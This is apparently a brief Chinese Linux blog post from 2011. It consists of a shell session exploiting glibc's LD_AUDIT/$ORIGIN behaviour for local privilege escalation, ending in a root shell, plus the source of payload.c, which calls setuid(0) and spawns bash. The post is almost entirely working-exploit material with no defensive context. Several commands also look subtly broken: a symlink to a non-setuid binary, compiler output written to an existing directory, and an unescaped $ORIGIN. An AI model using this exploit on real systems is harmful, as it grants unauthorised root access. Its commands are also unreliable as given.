全部博文(282)
分类: LINUX
2011-06-01 15:49:25
[aaaa@demon ~]$ mkdir /tmp/a
[aaaa@demon~]$ ln -s /bin/ls /tmp/a/b
[aaaa@demon ~]$ exec 3< /tmp/a/b
[aaaa@demon ~]$ gcc -w -fPIC -shared -o /tmp/a payload.c
[aaaa@demon ~]$ LD_AUDIT="$ORIGIN" exec /proc/self/fd/3
payload.c
[root@demon ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
payload.c内容如下
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}